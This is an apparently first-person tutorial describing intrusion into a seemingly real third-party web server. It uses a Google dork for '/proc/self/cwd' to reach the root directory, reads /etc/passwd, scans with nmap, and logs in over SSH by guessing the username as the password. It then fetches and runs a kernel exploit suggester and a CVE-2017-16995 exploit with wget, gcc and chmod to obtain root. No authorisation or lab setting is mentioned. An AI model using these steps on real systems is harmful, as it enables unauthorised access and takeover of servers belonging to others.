For an ordinary user, Google is just a search engine used for searching text, images, videos, and news. However, the capabilities of this search engine are huge, more than it may seem, including searching for vulnerable websites.
Google Dork, also known as Google Dorking or Google Hacking, is a valuable resource for security researchers. It has its own built-in language of queries, called "Google Dork Operators".
The "inurl:" operator is used to retrieve results whose URL contains only a single keyword, for example, inurl: admin.
Using Google Dork and the inurl: /proc/self/cwd operator, this site was discovered, which contained a link leading directly to the server's root directory. This vulnerability lies in the fact that the site directory contains a symbolic link (symlink) that leads to the root directory (/).
Getting Information about Linux Users
So, once we have entered the server's root directory, we need to find out information about the users that exist on the system. They are contained in /etc/passwd and /etc/shadow. We need the passwd file, as the shadow file is simply not accessible to a regular user.
The names of regular users may begin with the ID 1000. The user kajari is the one we need.
Checking for OpenSSH Service on an Open Port
Using the Nmap tool, we will scan the server for open ports.
Open any terminal (even Termux) and type the following command:
$ nmap site.go.id
We get the output:
As we can see, port 22 is open and the OpenSSH service is running.
SSH Login
Connect to the server via SSH as kajari:
$ ssh site.go.id
Without further ado, let's try to enter a banal password, namely the username itself (kajari) and-...
Voila! We're in! Of course, this is far from the final. We still need to get root access.
Since the version of Ubuntu and the Linux kernel is old, we will use the "Linux Exploit Suggester" script from the GitHub repository. It detects security issues with Linux kernel machines and provides links to exploits for these vulnerabilities.
Downloading the Script and Searching for Vulnerabilities
We download and run the script with the following commands:
$ wget -O search.sh ...
$ chmod +x search.sh
$ ./search.sh
The script outputted a list of 4 vulnerabilities. The more likely vulnerability is CVE-2017-16995, which is the one we will use.
Downloading, Compiling, and Running the Exploit
From the vulnerability information, we download the exploit via the link provided in "Download URL":
$ wget -O exploit_code.c ...
Using the GCC compiler, we compile the exploit into an executable file:
$ gcc -o exploit exploit_code.c
And we run it:
$ chmod +x exploit
$ ./exploit
Congratulations! We have gained root access! This is evidenced by the output of the whoami command and the prompt (#).
